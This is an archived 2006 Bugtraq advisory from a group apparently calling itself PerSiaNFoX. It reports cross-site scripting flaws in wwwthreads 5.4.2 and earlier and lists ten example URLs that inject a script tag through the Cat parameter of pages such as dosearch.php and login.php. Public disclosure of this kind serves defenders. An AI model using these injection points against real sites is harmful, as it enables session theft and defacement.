[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

wwwthreads <= 5.4.2 croos site script vulnerbilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: wwwthreads <= 5.4.2 croos site script vulnerbilities
From: h4ck3riran@xxxxxxxxx
Date: 24 Sep 2006 07:16:47 -0000

*******************************************************************************
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                           PerSiaNFoX DigitaL SecuritY TeaM  
                                               ***                              
                                                                               
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
*******************************************************************************

<# wwwthreads <= 5.4.2  Cross Site Script Vulnerabilities 

<# Script.............. : wwwthreads
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : XSS
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

-------------------------------------------------------------------------------------------------------------
Exploits :

Www.site.coM/[path]/dosearch.php?Cat=<script>
Www.site.coM/[path]/postlist.php?Cat=<script>
Www.site.coM/[path]/showmembers.php?Cat=<script>
Www.Site.coM/[path]/faq_english.php?Cat=<script>
Www.Site.coM/[path]/online.php?Cat=<script>
Www.Site.coM/[path]/login.php?Cat=<script>
Www.Site.coM/[path]/newuser.php?Cat=<script>
Www.Site.coM/[path]/wwwthreads.php?Cat=<script>
Www.Site.coM/[path]/search.php?Cat=<script>
Www.Site.coM/[path]/postlist.php?Cat=<script>

Prev by Date: [ MDKSA-2006:170 ] - Updated webmin packages fix XSS vulnerability
Next by Date: [ MDKSA-2006:169 ] - Updated Thunderbird packages fix multiple vulnerabilities
Previous by thread: [ MDKSA-2006:170 ] - Updated webmin packages fix XSS vulnerability
Next by thread: [ MDKSA-2006:169 ] - Updated Thunderbird packages fix multiple vulnerabilities
Index(es):
- Date
- Thread